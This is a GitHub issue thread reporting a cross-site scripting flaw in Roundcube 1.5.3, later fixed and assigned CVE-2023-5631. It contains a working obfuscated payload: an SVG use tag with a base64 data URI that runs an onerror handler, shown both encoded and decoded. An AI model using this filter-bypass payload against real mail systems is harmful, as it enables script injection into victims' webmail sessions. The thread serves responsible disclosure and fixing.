### ISSUE TITLE
XSS with svg use tag on RC 1.5.3

### ISSUE THREAD

**Issue by progsmile** [roundcube/roundcubemail#9168]
Hello dear developers!
Next sample shows me XSS. Would be pleased if you could check it on latest Roundcube version.

### Reproduce:
1. Send html to your mailbox with following content

```html
    <svg><use href="dAta:image/s	vg+xml;base64,PHN2ZyBpZD0ieDIiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+IDxpbWFnZSBocmVmPSJ4IiBvbmVycm9yPSJhbGVydCgyMzQpIiAvPjwvc3ZnPg==#x2">
```

This is encoded string to base64 that you see above:
```html
<svg id="x2" xmlns="http://www.w3.org/2000/svg"> <image href="x" onerror="alert(234)" /></svg>
```

2. Ensure browser alerts with "234"

### Env

RoundCube version: 1.5.3
Browsers: Google Chrome (Version 117.0.5938.62), Mozila Firefox (117.0.1 (64-bit))

Thanks!

**Comment by alecpl** [comment]
I'm unable to reproduce the issue in Firefox nor Chrome. The href attribute is indeed passed as-is to the browser, but it does not execute the javascript code.

Tested with 1.5.4, but I don't see anything related in the changelog since 1.5.3. So, maybe I'm doing something wrong. Could you provide a complete test message?

**Comment by alecpl** [comment]
Ok, I was able to reproduce now.

**Comment by alecpl** [comment]
Fixed.

**Comment by progsmile** [comment]
@alecpl Thanks!

**Comment by carnil** [comment]
This issue got [CVE-2023-5631](https://www.cve.org/CVERecord?id=CVE-2023-5631) assigned.
